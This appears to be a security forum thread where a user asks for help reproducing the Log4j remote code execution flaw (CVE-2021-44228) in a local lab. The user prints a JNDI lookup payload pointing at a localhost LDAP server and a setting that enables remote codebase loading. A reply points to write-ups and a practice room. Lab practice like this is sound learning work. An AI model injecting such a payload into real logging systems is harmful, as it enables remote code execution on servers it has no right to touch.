CVE-2021-44228 Log4j RCE POC tests

Hi guys,
TLDR: Has anyone run any succesful poc tests of this vuln, and if so any recommended resources?

I’m trying to run local poc tests on this cve, with no luck so far. I’ve followed mostly: GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行
Basically I’ve set up a local codebase with an exploit java class (runs calc), using GitHub - mbechler/marshalsec for jndi injection, and i created a vulnerable app that just sets trustUrl propery and logs a placeholder:

System.setProperty(“com.sun.jndi.ldap.object.trustURLCodebase”,“true”);
logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");

So if I’m understanding this correctly, this should trigger the exploit. Runs ok and all but doesn’t call the exploit. I’m currently using log4j ver 2.0-rc1 which should be vulnerable, and jdk 1.8.0_301. I have also tried other log4j versions and jdks.

Has anyone run any succesful poc tests of this vuln, and if so any recommended resources?
Thank you

I understand that you are trying to setup a lab for practice. I can assure you if you had looked up videos or write-ups using a search engine you could have found something of use to you. Cloudflare write-up and a video demonstrating it below. This is the github referenced in the video.

You can go step by step doing it yourself on specially prepared room for this:

2 Likes

This post was flagged by the community and is temporarily hidden.